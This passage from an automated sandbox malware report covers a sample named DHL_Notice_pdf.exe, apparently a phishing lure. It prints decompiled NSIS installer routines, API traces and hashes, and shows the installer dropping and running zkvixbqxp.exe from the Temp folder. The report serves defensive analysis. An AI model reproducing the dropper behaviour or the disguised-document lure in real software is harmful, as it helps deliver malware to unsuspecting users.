                                                            					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
                                                            						goto L32;
                                                            					} else {
                                                            						goto L28;
                                                            					}
                                                            				} else {
                                                            					do {
                                                            						_t107 = _t110;
                                                            						asm("sbb eax, eax");
                                                            						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                                                            						if(_t110 >= _t82) {
                                                            							_t107 = _t82;
                                                            						}
                                                            						if(E004035E2(0x418ef0, _t107) == 0) {
                                                            							E0040302E(1);
                                                            							L32:
                                                            							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                            						}
                                                            						if( *0x42a274 != 0) {
                                                            							if((_a4 & 0x00000002) == 0) {
                                                            								E0040302E(0);
                                                            							}
                                                            							goto L20;
                                                            						}
                                                            						E00406113( &_v40, 0x418ef0, 0x1c);
                                                            						_t89 = _v40;
                                                            						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                            							_a4 = _a4 | _t89;
                                                            							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                                            							_t92 = _v16;
                                                            							 *0x42a274 =  *0x420ef0;
                                                            							if(_t92 > _t110) {
                                                            								goto L32;
                                                            							}
                                                            							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                            								_v12 = _v12 + 1;
                                                            								_t110 = _t92 - 4;
                                                            								if(_t107 > _t110) {
                                                            									_t107 = _t110;
                                                            								}
                                                            								goto L20;
                                                            							} else {
                                                            								break;
                                                            							}
                                                            						}
                                                            						L20:
                                                            						if(_t110 <  *0x420f00) {
                                                            							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                                                            						}
                                                            						 *0x420ef0 =  *0x420ef0 + _t107;
                                                            						_t110 = _t110 - _t107;
                                                            					} while (_t110 != 0);
                                                            					_t94 = 0;
                                                            					goto L24;
                                                            				}
                                                            			}





























                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 004030E4
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL_Notice_pdf.exe,00000400), ref: 00403100
                                                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL_Notice_pdf.exe,80000000,00000003), ref: 0040615C
                                                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_Notice_pdf.exe,C:\Users\user\Desktop\DHL_Notice_pdf.exe,80000000,00000003), ref: 00403149
                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL_Notice_pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                            • API String ID: 2803837635-2516555563
                                                            • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                            • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                            • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                            • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                            				void* __esi;
                                                            				void* _t35;
                                                            				void* _t43;
                                                            				void* _t45;
                                                            				FILETIME* _t51;
                                                            				FILETIME* _t64;
                                                            				void* _t66;
                                                            				signed int _t72;
                                                            				FILETIME* _t73;
                                                            				FILETIME* _t77;
                                                            				signed int _t79;
                                                            				WCHAR* _t81;
                                                            				void* _t83;
                                                            				void* _t84;
                                                            				void* _t86;
                                                            
                                                            				_t77 = __ebx;
                                                            				 *(_t86 - 8) = E00402DA6(0x31);
                                                            				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                            				_t35 = E00405FAE( *(_t86 - 8));
                                                            				_push( *(_t86 - 8));
                                                            				_t81 = L"\"C:\\";
                                                            				if(_t35 == 0) {
                                                            					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                                                            				} else {
                                                            					E00406668();
                                                            				}
                                                            				E004068EF(_t81);
                                                            				while(1) {
                                                            					__eflags =  *(_t86 + 8) - 3;
                                                            					if( *(_t86 + 8) >= 3) {
                                                            						_t66 = E0040699E(_t81);
                                                            						_t79 = 0;
                                                            						__eflags = _t66 - _t77;
                                                            						if(_t66 != _t77) {
                                                            							_t73 = _t66 + 0x14;
                                                            							__eflags = _t73;
                                                            							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                            						}
                                                            						asm("sbb eax, eax");
                                                            						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                            						__eflags = _t72;
                                                            						 *(_t86 + 8) = _t72;
                                                            					}
                                                            					__eflags =  *(_t86 + 8) - _t77;
                                                            					if( *(_t86 + 8) == _t77) {
                                                            						E00406133(_t81);
                                                            					}
                                                            					__eflags =  *(_t86 + 8) - 1;
                                                            					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                            					__eflags = _t43 - 0xffffffff;
                                                            					 *(_t86 - 0x38) = _t43;
                                                            					if(_t43 != 0xffffffff) {
                                                            						break;
                                                            					}
                                                            					__eflags =  *(_t86 + 8) - _t77;
                                                            					if( *(_t86 + 8) != _t77) {
                                                            						E004056CA(0xffffffe2,  *(_t86 - 8));
                                                            						__eflags =  *(_t86 + 8) - 2;
                                                            						if(__eflags == 0) {
                                                            							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                            						}
                                                            						L31:
                                                            						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                                            						__eflags =  *0x42a2e8;
                                                            						goto L32;
                                                            					} else {
                                                            						E00406668(0x40b5f8, _t83);
                                                            						E00406668(_t83, _t81);
                                                            						E004066A5(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                                                            						E00406668(_t83, 0x40b5f8);
                                                            						_t64 = E00405CC8("C:\Users\hardz\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                                                            						__eflags = _t64;
                                                            						if(_t64 == 0) {
                                                            							continue;
                                                            						} else {
                                                            							__eflags = _t64 == 1;
                                                            							if(_t64 == 1) {
                                                            								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                                            								L32:
                                                            								_t51 = 0;
                                                            								__eflags = 0;
                                                            							} else {
                                                            								_push(_t81);
                                                            								_push(0xfffffffa);
                                                            								E004056CA();
                                                            								L29:
                                                            								_t51 = 0x7fffffff;
                                                            							}
                                                            						}
                                                            					}
                                                            					L33:
                                                            					return _t51;
                                                            				}
                                                            				E004056CA(0xffffffea,  *(_t86 - 8));
                                                            				 *0x42a314 =  *0x42a314 + 1;
                                                            				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                            				 *0x42a314 =  *0x42a314 - 1;
                                                            				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                            				_t84 = _t45;
                                                            				if( *(_t86 - 0x24) != 0xffffffff) {
                                                            					L22:
                                                            					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                            				} else {
                                                            					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                            					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                            						goto L22;
                                                            					}
                                                            				}
                                                            				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                                            				__eflags = _t84 - _t77;
                                                            				if(_t84 >= _t77) {
                                                            					goto L31;
                                                            				} else {
                                                            					__eflags = _t84 - 0xfffffffe;
                                                            					if(_t84 != 0xfffffffe) {
                                                            						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                                                            					} else {
                                                            						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                            						lstrcatW(_t81,  *(_t86 - 8));
                                                            					}
                                                            					_push(0x200010);
                                                            					_push(_t81);
                                                            					E00405CC8();
                                                            					goto L29;
                                                            				}
                                                            				goto L33;
                                                            			}



















                                                            APIs
                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                            • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000000,00000000,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                            • String ID: "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                                            • API String ID: 1941528284-4159427326
                                                            • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                            • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                            • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                            • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                                            C-Code - Quality: 100%
                                                            			E004069C5(intOrPtr _a4) {
                                                            				short _v576;
                                                            				signed int _t13;
                                                            				struct HINSTANCE__* _t17;
                                                            				signed int _t19;
                                                            				void* _t24;
                                                            
                                                            				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                            				if(_t13 > 0x104) {
                                                            					_t13 = 0;
                                                            				}
                                                            				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                            					_t19 = 1;
                                                            				} else {
                                                            					_t19 = 0;
                                                            				}
                                                            				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                            				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                            				return _t17;
                                                            			}









                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                            • wsprintfW.USER32 ref: 00406A17
                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                            • String ID: %s%S.dll$UXTHEME$\
                                                            • API String ID: 2200240437-1946221925
                                                            • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                            • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                            • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                            • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                                                            C-Code - Quality: 100%
                                                            			E00405B99(WCHAR* _a4) {
                                                            				struct _SECURITY_ATTRIBUTES _v16;
                                                            				struct _SECURITY_DESCRIPTOR _v36;
                                                            				int _t22;
                                                            				long _t23;
                                                            
                                                            				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                            				_v36.Owner = 0x4083f8;
                                                            				_v36.Group = 0x4083f8;
                                                            				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                            				_v16.lpSecurityDescriptor =  &_v36;
                                                            				_v36.Revision = 1;
                                                            				_v36.Control = 4;
                                                            				_v36.Dacl = 0x4083e8;
                                                            				_v16.nLength = 0xc;
                                                            				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                            				if(_t22 != 0) {
                                                            					L1:
                                                            					return 0;
                                                            				}
                                                            				_t23 = GetLastError();
                                                            				if(_t23 == 0xb7) {
                                                            					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                            						goto L1;
                                                            					}
                                                            					return GetLastError();
                                                            				}
                                                            				return _t23;
                                                            			}








                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                            • GetLastError.KERNEL32 ref: 00405BF0
                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                            • GetLastError.KERNEL32 ref: 00405C0F
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 3449924974-3916508600
                                                            • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                            • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                            • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                            • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 538 406187-406193 539 406194-4061c8 GetTickCount GetTempFileNameW 538->539 540 4061d7-4061d9 539->540 541 4061ca-4061cc 539->541 543 4061d1-4061d4 540->543 541->539 542 4061ce 541->542 542->543
                                                            C-Code - Quality: 100%
                                                            			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                            				intOrPtr _v8;
                                                            				short _v12;
                                                            				short _t12;
                                                            				intOrPtr _t13;
                                                            				signed int _t14;
                                                            				WCHAR* _t17;
                                                            				signed int _t19;
                                                            				signed short _t23;
                                                            				WCHAR* _t26;
                                                            
                                                            				_t26 = _a4;
                                                            				_t23 = 0x64;
                                                            				while(1) {
                                                            					_t12 =  *L"nsa"; // 0x73006e
                                                            					_t23 = _t23 - 1;
                                                            					_v12 = _t12;
                                                            					_t13 =  *0x40a5ac; // 0x61
                                                            					_v8 = _t13;
                                                            					_t14 = GetTickCount();
                                                            					_t19 = 0x1a;
                                                            					_v8 = _v8 + _t14 % _t19;
                                                            					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                            					if(_t17 != 0) {
                                                            						break;
                                                            					}
                                                            					if(_t23 != 0) {
                                                            						continue;
                                                            					} else {
                                                            						 *_t26 =  *_t26 & _t23;
                                                            					}
                                                            					L4:
                                                            					return _t17;
                                                            				}
                                                            				_t17 = _t26;
                                                            				goto L4;
                                                            			}













                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 004061A5
                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                            • API String ID: 1716503409-1968954121
                                                            • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                            • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                            • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                            • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 544 403c25-403c34 545 403c40-403c48 544->545 546 403c36-403c39 CloseHandle 544->546 547 403c54-403c60 call 403c82 call 405d74 545->547 548 403c4a-403c4d CloseHandle 545->548 546->545 552 403c65-403c66 547->552 548->547
                                                            C-Code - Quality: 100%
                                                            			E00403C25() {
                                                            				void* _t1;
                                                            				void* _t2;
                                                            				void* _t4;
                                                            				signed int _t11;
                                                            
                                                            				_t1 =  *0x40a018; // 0xffffffff
                                                            				if(_t1 != 0xffffffff) {
                                                            					CloseHandle(_t1);
                                                            					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                            				}
                                                            				_t2 =  *0x40a01c; // 0xffffffff
                                                            				if(_t2 != 0xffffffff) {
                                                            					CloseHandle(_t2);
                                                            					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                            					_t11 =  *0x40a01c;
                                                            				}
                                                            				E00403C82();
                                                            				_t4 = E00405D74(_t11, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\nsd7F3D.tmp\\", 7); // executed
                                                            				return _t4;
                                                            			}








                                                            APIs
                                                            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                            • C:\Users\user\AppData\Local\Temp\nsd7F3D.tmp\, xrefs: 00403C5B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsd7F3D.tmp\
                                                            • API String ID: 2962429428-1503489692
                                                            • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                            • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                            • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                            • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 636 4015c1-4015d5 call 402da6 call 405fe2 641 401631-401634 636->641 642 4015d7-4015ea call 405f64 636->642 643 401663-4022f6 call 401423 641->643 644 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 641->644 649 401604-401607 call 405c16 642->649 650 4015ec-4015ef 642->650 660 402c2a-402c39 643->660 661 40292e-402935 643->661 644->660 663 40165b-40165e 644->663 659 40160c-40160e 649->659 650->649 653 4015f1-4015f8 call 405c33 650->653 653->649 667 4015fa-4015fd call 405b99 653->667 665 401610-401615 659->665 666 401627-40162f 659->666 661->660 663->660 669 401624 665->669 670 401617-401622 GetFileAttributesW 665->670 666->641 666->642 672 401602 667->672 669->666 670->666 670->669 672->659
                                                            C-Code - Quality: 86%
                                                            			E004015C1(short __ebx, void* __eflags) {
                                                            				void* _t17;
                                                            				int _t23;
                                                            				void* _t25;
                                                            				signed char _t26;
                                                            				short _t28;
                                                            				short _t31;
                                                            				short* _t34;
                                                            				void* _t36;
                                                            
                                                            				_t28 = __ebx;
                                                            				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                            				_t17 = E00405FE2(_t16);
                                                            				_t32 = _t17;
                                                            				if(_t17 != __ebx) {
                                                            					do {
                                                            						_t34 = E00405F64(_t32, 0x5c);
                                                            						_t31 =  *_t34;
                                                            						 *_t34 = _t28;
                                                            						if(_t31 != _t28) {
                                                            							L5:
                                                            							_t25 = E00405C16( *(_t36 + 8));
                                                            						} else {
                                                            							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                            							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                                                            								goto L5;
                                                            							} else {
                                                            								_t25 = E00405B99( *(_t36 + 8)); // executed
                                                            							}
                                                            						}
                                                            						if(_t25 != _t28) {
                                                            							if(_t25 != 0xb7) {
                                                            								L9:
                                                            								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                            							} else {
                                                            								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                            								if((_t26 & 0x00000010) == 0) {
